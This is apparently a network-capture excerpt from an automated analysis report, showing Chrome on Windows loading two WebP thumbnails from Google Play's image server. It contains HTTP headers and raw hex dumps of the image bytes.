                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 10850
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5844
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC856INData Raw: 52 49 46 46 5a 2a 00 00 57 45 42 50 56 50 38 20 4e 2a 00 00 b0 8c 00 9d 01 2a a6 00 28 01 3e 5d 24 8f 45 23 a2 21 17 5a d6 04 38 05 c4 b4 04 38 00 ca 8a 1c 7f 39 d6 e5 b9 bb cf e4 bf e2 c7 cc ad 8d fb 9f e0 7f cb ae 82 1a f7 e8 03 df 83 9d 3f d3 ff 85 fd dc fe fb f3 47 fc 07 fc df f2 1e e8 3f 47 fb 02 fe a5 ff 99 fe f5 fd b7 fe df 6a 3f dd 3f c0 0f 80 df d2 ff c5 fe cc 7b c1 7f b3 fd 80 f7 65 fd c7 d4 0f fb 87 f7 5f 5a 2f f7 ff ff fd c8 ff bc ff 97 ff ff ee 27 fb 01 ff b7 d7 3f f6 f3 e0 cf fb 37 fc 8f db ff 81 1f d9 6f fc 9e c0 1f fc bd 40 3f ec 75 97 f5 53 fb 8f 6c 1f e1 7f 28 7c f3 f1 63 e9 1f 6b 3f b0 fb 6b 7f 7d e1 3b a9 bf e4 7a 29 fc b3 ed ff e6 ff b8 fe e8 fb 27 ff 23 c2 3f 8d bf e3 7a 82 fe 39 fc 9f fc c7 f6 df c8 4f 56 5d a0 fa ef fb 9f f7 de a0
                                                                                                                                                                                                                                  Data Ascii: RIFFZ*WEBPVP8 N**(>]$E#!Z889?G?Gj??{e_Z/'?7o@?uSl(|ck?k};z)'#?z9OV]
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 7c 94 58 70 e3 7b 61 e0 2c 6b 4b 16 65 28 fb b3 99 16 54 05 80 3c 02 03 32 2a 24 f8 ac b6 57 7d 02 76 e5 9f 22 e8 47 c8 25 d6 21 ce a8 95 47 dd b0 22 8c b8 fb 4f f1 3a 9e f3 6b fc 98 5c 8f e8 52 13 cc 67 de 4a 6f aa b3 ee cc db 21 49 34 be d8 df f0 5b fc 02 a3 b9 ec d5 ca 42 8a ac 64 66 86 92 86 eb 8c 89 d5 1d 1d 51 d0 e5 8e 70 fa 6c 9c 4b c2 f2 e2 c5 06 bb ba 79 7b 42 7b 3e f3 88 fa 81 ce 79 fb 7b 96 0c 3e 59 24 a8 e1 10 9b 4c 08 0e b7 12 4a 2a fc cf cf 94 48 08 c5 ff 0c f5 7d 3d 26 dc 73 5f d6 a7 a6 98 a2 09 34 fc 0e c6 5b 92 33 f9 31 9e 7f 93 27 2c 5b 17 6e 7c a1 05 20 55 02 d0 b3 00 b5 5d 39 bb fd 0a 94 3a 11 ef 37 22 d3 64 e6 99 e8 12 a9 36 06 22 74 b3 52 5b 48 c2 af c5 3c 1e 29 c0 46 22 7d f0 1e e7 3b 36 f0 a6 24 37 4b 32 95 0f 08 65 ea e1 7c 71 fd
                                                                                                                                                                                                                                  Data Ascii: |Xp{a,kKe(T<2*$W}v"G%!G"O:k\RgJo!I4[BdfQplKy{B{>y{>Y$LJ*H}=&s_4[31',[n| U]9:7"d6"tR[H<)F"};6$7K2e|q
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: ab f6 98 33 fc 2b d8 0d 2a 34 75 1d a3 94 ff 04 3c 6a 0d 18 75 d9 e1 d9 7f 6d a9 9e ea 69 11 b9 82 1d a6 93 60 d7 b7 93 8b 29 c4 91 88 78 ef 3e cb 27 e3 46 fe 88 2d 37 5e 27 eb 6b ad ce 8a 30 18 7a 2b 16 56 d0 df 2a 75 19 49 32 a1 20 df fe 1e e7 b2 8a c6 2f 0f 7f 80 ad fd 0a 30 46 f1 e0 e9 3b 74 83 50 6d db b3 3c a6 9f d5 7f 6b 80 01 a2 4e a3 8c 63 e4 3d 86 58 d5 bc 4e c9 dd 7c 3a 82 66 22 87 73 6a 89 89 a4 f9 ba cd 13 f8 e3 1d 29 16 e6 08 74 19 5b 52 cf 03 91 26 52 73 88 5b 3a 10 e0 e4 a9 56 92 1e 32 a1 7f c6 5e d9 11 cd 47 b6 07 0f 8e ce 31 1b fb 37 fb ee 3a bc 59 f1 20 db 05 80 4e 84 75 44 84 95 71 a7 a5 cc 76 68 75 16 69 c3 dd 5f ee fd 68 13 c1 d6 7d 84 99 be 88 0f 37 2e 7f 8d c9 7a 5b 00 58 f4 73 00 0b bf 02 e5 8e 24 9b 84 f5 e7 cf ab 7f 52 49 df 8f
                                                                                                                                                                                                                                  Data Ascii: 3+*4u<jumi`)x>'F-7^'k0z+V*uI2 /0F;tPm<kNc=XN|:f"sj)t[R&Rs[:V2^G17:Y NuDqvhui_h}7.z[Xs$RI
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 47 44 42 f0 46 25 6d 4a 36 90 90 62 63 ca 24 1d fc 1e 25 c6 90 ba f5 be c5 c0 bd 24 b0 08 70 0d a1 0c f5 3f 06 12 0c aa fc 82 29 d6 27 79 b3 16 27 d4 27 02 e1 87 33 d4 fc 85 e0 7a 39 0e 2c 46 ef d1 44 22 47 93 b3 3e 95 95 26 05 ae 68 3a 9e e5 e8 e2 e2 9a 0b a7 ce 99 22 30 fa 7e a2 87 0f cc 21 bb d6 ab f6 da e5 35 12 e2 79 ed 7c ca 8c e3 d4 a0 57 ac 69 83 7d 86 85 9e c7 d8 24 5a 8a c2 fb 2f ff 01 92 21 82 74 3e 3b ca e4 9d bf 65 e8 97 5f 61 ea 84 8a ea 91 75 b3 b7 1f a5 60 08 74 10 4f f5 a7 00 cc 40 82 ed 73 b6 b1 d2 91 79 ae aa 62 e4 b3 e0 8a a1 9a 7f b6 2b 5b 15 55 bb 68 e9 3d 9f d9 23 06 cf f3 e6 6b ff 04 8b f6 7e c4 f8 9f ae 8c 0b 1d 7b fa 00 81 c7 6f c2 57 bc 8a bf 5f 0f 82 b5 27 30 8c 6f 9a 64 5e 13 86 10 71 b5 53 e7 da 40 99 c5 42 bd 99 5c b8 96 5a
                                                                                                                                                                                                                                  Data Ascii: GDBF%mJ6bc$%$p?)'y''3z9,FD"G>&h:"0~!5y|Wi}$Z/!t>;e_au`tO@syb+[Uh=#k~{oW_'0od^qS@B\Z
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 0f e0 58 b6 d9 aa f3 0a 49 be ab d4 e7 b5 59 10 34 ea 42 2c 91 fd a6 3e e0 2c d8 09 48 5a ee 11 05 d8 fd 29 ae f9 6c ab e9 54 31 76 c9 0b b7 ea 41 84 c0 34 a8 87 95 e4 cb ca b6 3f a5 88 70 9e 95 10 f9 a0 e1 40 32 3d 38 b6 ec 7c 3a a9 2d 51 86 9f 6f 19 5f f0 42 6a 78 29 92 96 10 1e 40 8e 78 98 67 3a 34 f6 81 08 23 e9 ca 2b d1 00 86 87 dc 4e b6 70 a6 d4 0d 71 f6 26 c0 c5 00 4b f9 c2 c0 12 ba 04 95 fb fa 9d 7d b6 b3 57 90 3d 24 7b bd ae ed 04 38 1c aa af a9 fb b1 4d 90 28 a6 70 1d ec 62 57 72 59 0c 84 72 11 15 5b dc 03 85 d3 a2 e5 2d 54 66 6b 3e a3 bf ed 1c 33 d1 a4 89 a1 8f 8b f0 66 0c 2c c4 b4 92 ef 82 6e d5 6e 20 8b 0d 54 b2 3b 8d 3c 71 17 d4 75 fa fb 35 f5 e4 8e 85 a6 05 44 c7 23 f3 9d ba fb ef 51 cb d1 b4 6e aa c8 9b ed 24 d9 24 e6 e3 ca 2d c2 e5 13 9c
                                                                                                                                                                                                                                  Data Ascii: XIY4B,>,HZ)lT1vA4?p@2=8|:-Qo_Bjx)@xg:4#+Npq&K}W=${8M(pbWrYr[-Tfk>3f,nn T;<qu5D#Qn$$-
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 81 b3 16 a0 cb 62 ad 03 bf 02 c3 37 67 46 8a 90 cb 43 0e a3 c5 b9 2c 9d 00 ed 0a 61 2b 0e c5 39 d5 f9 75 ca d6 14 46 33 45 08 d5 f4 c7 45 9c 26 bf f2 89 bb 83 ce 53 8a 29 4c 1d 80 51 43 19 9a 9f 90 5a 42 fd 79 5a 00 a7 f9 bb 6d 2d fe 8a af 70 d0 05 89 fa a3 ee 28 3c 01 aa 8f 38 93 0a 49 1e 54 e8 6d fe 10 84 8a a1 db 20 d6 7d ef cf d7 d3 36 57 9c d0 b2 c2 af c3 db 97 be 16 e6 33 06 12 3b cb be 61 94 7f 6f 8a da c1 b7 fa 72 55 e8 22 8f 10 09 c4 bb 55 4c ab 57 78 b2 13 3d 62 0f 10 e1 3d e1 cc c4 4d 6b e7 72 bb 9f f7 3a f1 9d e3 ea df b7 a7 66 4a 97 1a 3b 4d d7 95 e2 4c 9b 5f 05 56 22 85 9e 44 d7 26 b6 a6 b2 17 82 70 78 6b 8d de 97 16 5b 93 eb 09 08 3a da 29 a5 a5 59 1a 64 61 6b 0f af 99 37 19 67 77 c7 29 21 6c 8e d7 ac e2 41 cf 22 d4 80 6c 49 5b ed 11 e5 3f
                                                                                                                                                                                                                                  Data Ascii: b7gFC,a+9uF3EE&S)LQCZByZm-p(<8ITm }6W3;aorU"ULWx=b=Mkr:fJ;ML_V"D&pxk[:)Ydak7gw)!lA"lI[?
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: e3 84 c7 b4 ed 5c 51 64 29 32 27 88 c1 fa 45 b4 85 39 d4 ba 68 23 1d 33 00 40 07 5d c8 a6 ca 4c db c3 d8 7c 71 6b fd a7 19 a3 ce b9 46 b4 d7 c1 3e 0a e1 a8 3a bd 81 d6 af af ac 7d b6 06 43 69 3e 7c ca 84 23 aa df f9 cc e7 af a9 15 41 35 c9 97 c4 b1 39 21 29 16 32 13 5e 95 67 52 48 14 06 de fa 7c d7 d7 6c 38 18 58 8d f1 0a 52 92 f6 38 d6 ae fd 90 a5 99 a0 91 df 30 de 37 ed 8b 42 a4 e3 47 0f 52 a0 c3 22 7b bd 48 24 c0 07 01 82 25 e5 89 7a 55 b0 69 a8 4e 5d 12 c3 ed 72 8b 0a e6 e3 7e 4a 99 42 72 79 2d 68 9a 4f 4e d1 3e b4 5f f1 9f c1 43 0f 6d 23 69 dc e0 1f ca 27 64 53 37 0a e9 ef 44 38 42 15 26 97 dc c4 7a 8a 0f 27 13 5c fd 1d b1 18 19 08 e7 c2 13 50 26 83 fa 01 09 29 d3 2f dc 56 8f 0f 16 08 94 87 fe aa 03 00 17 a0 51 84 8a c2 7f 83 5e de ce 19 bd 68 cb f1
                                                                                                                                                                                                                                  Data Ascii: \Qd)2'E9h#3@]L|qkF>:}Ci>|#A59!)2^gRH|l8XR807BGR"{H$%zUiN]r~JBry-hON>_Cm#i'dS7D8B&z'\P&)/VQ^h
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 5c 1c 6b 3a d6 75 1d 15 54 86 e8 d9 2d e3 6c 3f b6 f5 29 a0 d4 73 83 63 53 39 c8 8b ba 66 a9 ee ad 21 96 a8 99 ec c9 fb 2d 34 02 da 0c a6 db 88 69 57 89 76 cb d3 b2 c3 8b ab ca e1 67 d0 b2 bd 5b 58 89 39 7c 15 a9 cd 10 3f 44 7e 9e d9 8d b2 76 7a 96 ba cc 70 78 34 bc 80 9d c1 04 d6 a4 a1 e3 d4 71 31 fa c2 7f 0b f7 9b e6 b0 e8 bc a2 11 68 76 89 cb a3 20 4c a0 ad fc 2d d1 3f e1 92 37 ab 8c aa 02 1c 29 57 cf 6b 49 20 87 a9 d3 ce 2a 15 f1 82 3d 7b af 41 4f f2 4c ea d3 67 40 8b ea dd f9 7f 11 7a 9c 16 d9 04 4c e8 fb e3 25 a2 04 a1 ef 63 a9 fb 72 52 38 e6 8a 04 58 5c 3f ae 24 56 ad ff c9 32 7b 8e 87 9d e3 03 a9 65 60 ae 2c 10 d9 ac 5b bd da bd 9d fe 4d c7 93 34 82 3b 60 b6 73 cf 52 ab b9 d4 95 f9 dd 86 91 26 63 2f 6c ed c8 76 3d ad 07 f9 bc 73 ef 5b b5 8a 5b 73
                                                                                                                                                                                                                                  Data Ascii: \k:uT-l?)scS9f!-4iWvg[X9|?D~vzpx4q1hv L-?7)WkI *={AOLg@zL%crR8X\?$V2{e`,[M4;`sR&c/lv=s[[s
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC264INData Raw: 49 1a 3d cd 76 b7 3b 30 8f e2 86 b8 fb a7 66 0a 63 0f 09 e1 89 97 40 9c f0 e8 3f 3a 75 0d 67 eb 05 aa 43 36 d1 50 c4 eb 76 1b 16 07 fd 1e 6f 00 14 92 87 2d 81 8e 26 46 a8 b6 cf 60 b1 6a b8 89 40 af f2 0c a7 6e e3 d2 de 2f 9e 4e 29 06 de 8e 10 31 9f 5e 6c d4 0c 2a 17 d9 81 29 79 c5 ef 15 9d e9 64 07 7d ba 47 23 d7 2c c1 1d 28 b7 72 3c e3 a4 bf cd d0 1c 17 49 37 72 1f a7 ce 85 d2 04 b9 92 eb f3 8b 7f f5 68 00 5d 96 f9 c0 99 40 a0 05 4a f9 d9 b4 7c c8 12 ca fd 99 b5 fb 6a bb 82 e3 b1 45 c4 da 22 65 7d 80 ae db a0 8a e1 5b bd c0 41 29 a0 52 3f 8b ee 64 00 46 f1 a3 bd 2d 39 fb 72 d6 7e 20 1e 6e f3 ab e3 c6 64 19 ef 9b 35 00 dc 03 d5 b8 48 77 83 c4 a0 00 03 70 2b 9a d7 f9 a7 ff 9f 2c f1 8d 45 68 96 2f b7 cb 56 6c a9 dd 28 03 fc 90 57 55 57 2f 7e 7e f1 14 09 56
                                                                                                                                                                                                                                  Data Ascii: I=v;0fc@?:ugC6Pvo-&F`j@n/N)1^l*)yd}G#,(r<I7rh]@J|jE"e}[A)R?dF-9r~ nd5Hwp+,Eh/Vl(WUW/~~V


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  120192.168.2.649973216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1095OUTGET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 10246
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5844
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC856INData Raw: 52 49 46 46 fe 27 00 00 57 45 42 50 56 50 38 20 f2 27 00 00 f0 90 00 9d 01 2a a6 00 28 01 3e 55 24 8f 45 23 a2 21 13 ea 86 b4 38 05 44 b2 37 6e bd c0 30 da 01 1f a8 7e 5d 77 a7 77 ff 21 f8 e1 fc f7 f5 ef e6 1a ce fe 63 fb 67 e9 5f dd 0e 70 d3 61 d9 ef ec 3f 32 ff b8 7c b8 ff 1d ff 13 fa a7 bb cf d2 9f f4 bd c0 3f 4e 3f d7 ff 52 fc 6f f8 b7 f5 a9 fb 95 ea 1f f9 b7 f7 1f fb df de fd dd ff d6 7e c0 7b b2 fe e3 ea 07 fd 5f fb c7 ac 77 fa ef ff fe e5 7f b5 de c1 5f cd 3f cd 7f f5 f5 cb fd d5 f8 36 fe b9 fe f7 f7 4b e0 5f f6 53 fe ff b0 07 ff 5f 50 0f fc dd 61 fd 73 fe a7 da cf f8 2f ca 1f 3c 7c 5f fa 3b f7 4f dc 7f f0 5e da d8 eb b4 9f e5 5f 78 ff 45 fd c7 f7 1f d8 bf f8 7e 1a fc 6a ff 03 d4 3b f1 df e6 ff e5 bf 35 b8 94 76 cf f5 df f6 bd 45 fd 95 fa 9f fb 0f
                                                                                                                                                                                                                                  Data Ascii: RIFF'WEBPVP8 '*(>U$E#!8D7n0~]ww!cg_pa?2|?N?Ro~{_w_?6K_S_Pas/<|_;O^_xE~j;5vE
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: bd bf d3 8a 60 d4 9f ee a0 6f 4d 4a 44 e1 7c b1 5a 26 88 17 ef 91 b3 74 2d 79 d3 54 d0 c3 15 67 4a 39 20 9b 5e 6a 4d bf 6e aa 3b ef 59 a7 13 ec 49 dd 43 1c cd 7b 2a fc 73 75 5b a2 f8 c1 aa 6c b6 69 42 6f 39 ec 0b cd 72 df 9f b5 4e da 40 6b b9 8d cb 7b 6c 3f ef 94 c7 27 fa cb 24 a3 f0 56 3b 44 49 1a fa 52 97 37 58 aa 7c 93 07 4c 25 c7 93 38 8a 7f 02 e1 c0 c8 15 2c 82 af a9 18 ec 57 2b 85 0e eb 9a ab 58 2c 73 77 70 3e 6c 0d 59 ca b7 a0 74 ae 2c a8 a0 52 84 de dc 55 e5 43 fd 2a 07 b1 65 60 49 96 19 60 b3 d3 39 66 89 b3 46 6f 9b dd fd d0 b6 21 f7 01 1a aa 60 bd 9c 8b 4a 13 77 e4 de 34 b2 1d d1 e6 d7 dd 19 8c 8d 67 fd 5a e6 c2 79 65 ff 0c a4 c0 6b b5 9b b1 9a 5d 22 fb 1c 16 17 1d 74 21 2c d3 2b 99 d2 f8 99 58 5c 66 df 3d 91 7d cf c1 ad 02 dd ff be bb 96 73 c8
                                                                                                                                                                                                                                  Data Ascii: `oMJD|Z&t-yTgJ9 ^jMn;YIC{*su[liBo9rN@k{l?'$V;DIR7X|L%8,W+X,swp>lYt,RUC*e`I`9fFo!`Jw4gZyek]"t!,+X\f=}s
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: ea f2 94 e6 3d a6 fa 21 73 5d 45 c9 39 39 44 7a e0 80 b5 62 85 01 76 3c 80 a2 99 f5 95 1e 46 dc c1 48 8c d7 46 72 a6 5b 78 21 ae 9d 59 d4 35 d3 6f 61 16 2a a1 ce f2 f4 6d 2f 88 17 fa f9 c8 d1 15 f4 eb 5d 64 25 5a e3 fe 8f 26 6f 01 d8 01 71 b1 72 8e 57 8a e6 34 06 64 45 07 a8 49 95 7b 35 38 7c 34 4f a3 9d 7e f5 ee d5 dd 69 0a 57 42 d1 ad 9d 17 80 ec 32 10 6b c0 e0 52 40 dd 51 ed 6d f9 6d 3a 0d 5b d6 1c 54 ae 48 eb 3f 2c cc 69 1d 86 95 a0 21 9b c7 b6 b3 f5 ad 17 96 64 2f 88 a6 d1 8f e5 a9 45 85 5c be 4f f2 26 0a d0 a0 87 d4 ab 72 ad 7f ec cf ab 60 77 af ff 51 43 fb 30 b1 11 38 f2 09 02 03 80 52 15 c4 e5 e3 e4 08 36 ba fd 84 1f 3f c6 84 7b 4e c0 4c 35 6a 58 b5 74 96 ea b4 75 af ee e8 2e 44 a1 8b 98 13 2d 2f 28 4d d5 89 34 77 b5 d2 ab d6 6b e7 dd 17 df dd 25
                                                                                                                                                                                                                                  Data Ascii: =!s]E99Dzbv<FHFr[x!Y5oa*m/]d%Z&oqrW4dEI{58|4O~iWB2kR@Qmm:[TH?,i!d/E\O&r`wQC08R6?{NL5jXtu.D-/(M4wk%
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 6d 65 cb d1 66 81 23 64 6f 5b c1 8d 3d 61 de 82 9f 80 51 8c dd 0b a6 dd 37 6c 7d aa 19 63 20 a8 51 ba 4c d5 9f 3d e6 b4 5f e5 ff 9a 77 48 ef ed 2e 77 18 92 76 0f 7c 31 e4 77 88 2c 74 29 37 d8 5d 43 17 8a a1 12 d4 1c f8 bf 20 e9 c0 b1 62 94 b9 af df c0 2d 20 6d c1 d4 24 91 f1 31 8a 8c 52 ba 81 e1 29 7e 02 39 00 72 41 b8 06 b0 87 ba 22 5b 27 fe 4f 9e 5a 6d 23 fb 64 86 d1 16 32 07 8f 0a 9f 14 c1 ee 0e 93 1e 3c 5a 92 27 13 47 b8 c6 f5 b0 ba 94 31 bf 0b 3e df d2 1e 47 05 9f b2 10 c1 ec 2d 22 29 63 12 85 cc 67 d1 5c b3 a2 5a 1b a1 fe a8 f7 80 c7 10 06 71 61 23 86 70 0d 4d f9 83 b4 4f d5 2f 45 bc d5 71 66 13 f1 5e e5 54 4d 47 32 cb 37 e5 22 f9 b5 ab 03 ba 09 8c a7 6d 3d 8c fd c4 60 8c 58 7c e4 4f ee ff 61 89 04 d6 ac 9b 81 2a b5 97 cd ca 8a c1 df cd 31 9e a4 69
                                                                                                                                                                                                                                  Data Ascii: mef#do[=aQ7l}c QL=_wH.wv|1w,t)7]C b- m$1R)~9rA"['OZm#d2<Z'G1>G-")cg\Zqa#pMO/Eqf^TMG27"m=`X|Oa*1i
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 91 75 17 b2 a2 23 b7 cb 7c 05 49 d0 0e 0f bd b8 83 65 d2 15 40 44 29 95 a5 96 43 e3 e9 69 dd 87 55 c3 2f 40 a7 b2 8b e3 1a d5 1e 64 a9 9c 41 87 a4 05 53 2c 6c 50 17 70 b1 4a 7a 76 3a 4d 50 53 6a f7 97 c1 65 ac 57 70 87 5f 26 6e 4a aa fd 4b 5e 41 80 de f3 29 01 b8 1d 54 b9 72 53 1d 56 dc 3a 3c 16 84 b2 34 a4 3f 1f 62 46 39 1c ca 5c 74 66 38 e2 f5 4d 39 90 95 59 0e 9a 57 30 57 e4 0a 6d 54 4a c8 32 1d 5b e1 89 3b 99 01 b4 b3 2d 6a 0b eb 1f 0d 92 40 a1 ae 53 24 e5 6f 71 b3 de 84 52 83 72 68 d8 37 02 51 0a fa b8 94 a0 a3 85 cd 1d 49 93 26 ff ac 3b 03 95 bf c8 15 c0 52 d1 18 3b b6 51 7a 9f 70 c0 0a a8 fc d2 2f 1b d8 e8 81 0a 1e 8d 81 83 9c e3 e6 09 eb c4 f7 ac d0 5a 33 33 66 67 39 de 7f 01 f8 7f a7 c4 c5 f1 95 94 05 90 d9 43 f4 c4 fe 0b e7 e4 7b 0f b2 85 39 bb
                                                                                                                                                                                                                                  Data Ascii: u#|Ie@D)CiU/@dAS,lPpJzv:MPSjeWp_&nJK^A)TrSV:<4?bF9\tf8M9YW0WmTJ2[;-j@S$oqRrh7QI&;R;Qzp/Z33fg9C{9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 64 ac de 00 45 d0 5f da 30 7d 15 4d ea 33 a9 9d 2c 51 62 57 c2 9c e7 44 53 d3 87 26 74 37 d6 d3 ae b1 34 4b 34 72 42 b1 61 0c 34 bc 96 7d 45 a7 39 95 f1 0c 98 8f 1d c2 6d f2 a5 08 69 c2 c3 a7 69 4e 89 aa 21 77 42 33 bd f9 94 da fc 7f 68 b2 f2 95 41 cd 66 02 bb c0 3f 91 39 d6 bf 79 7a 6a 73 dc 3f 43 5b 9f 25 bc 81 34 ac 0c aa 21 e5 e1 9d 8b 1a 5c a3 fd de 69 ae c3 f7 a8 f2 3d af 8a a4 63 84 f0 23 b8 de 6a f6 40 94 63 ef 46 f6 0e da f7 d4 14 fb 67 9b d8 63 c5 86 fe 25 98 cc 52 a3 b1 e2 3d 4c d3 40 d5 be ea ce 42 fb 3a 77 ee 8e 91 d0 f4 22 76 2a 13 6b 6e c6 f4 ce d3 8f d2 26 f2 49 b3 90 df cc 7f ad d6 79 3f a2 f5 b1 ce 90 ac 28 2f 0b 0e e4 65 d8 9f 1b 76 f8 53 d0 99 72 7e f8 8c 8a 27 cf c1 db a4 64 b6 be 37 b5 37 e4 97 56 cc b7 ca 8e 35 f2 be 6e 13 dd 95 f2
                                                                                                                                                                                                                                  Data Ascii: dE_0}M3,QbWDS&t74K4rBa4}E9miiN!wB3hAf?9yzjs?C[%4!\i=c#j@cFgc%R=L@B:w"v*kn&Iy?(/evSr~'d77V5n
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 30 97 93 a6 fe 56 c3 9c c5 47 16 0b 1f cb 3c 9d de b7 27 9d f7 47 38 c0 d2 10 aa 79 d4 0d 20 5e f2 ca 4f 05 c1 3e 35 a7 4d 25 50 f1 08 4b d6 d6 43 09 76 79 bd 51 65 3e 8c 3a e7 da e3 81 2e e2 41 4f 73 54 c4 ce 13 1d b1 e7 a5 66 55 e8 8b ea 8b 40 e7 58 33 93 81 ad 69 0e 1c 24 2e 49 34 c2 bb c8 2a 14 a1 03 ae 34 98 19 84 8f cc a7 37 07 0e 6c b9 23 de e3 6e 03 60 03 a5 f7 fd 80 3d 19 1a 77 f8 51 c1 9d c8 0a fc f2 d4 b4 76 16 f6 13 89 64 d4 b6 6e 86 09 20 ef 01 83 d5 54 93 b0 52 36 60 47 2b e5 fa 46 6d 5e 98 c7 7f 97 3d c5 8e 07 58 f4 f9 b7 aa 4f 8f 43 80 88 be d6 7d ab 9e 08 a7 10 de 45 11 4b 36 d5 25 51 14 e0 ea 84 d2 69 8c 66 fc 29 ce 5f 53 2d 31 eb 16 bc 49 fa 4c d6 00 2a 56 c2 e9 fa f0 f9 19 93 e4 03 a0 98 52 5d 8d 94 64 bf f9 4f d3 60 34 b9 4a 48 e0 3e
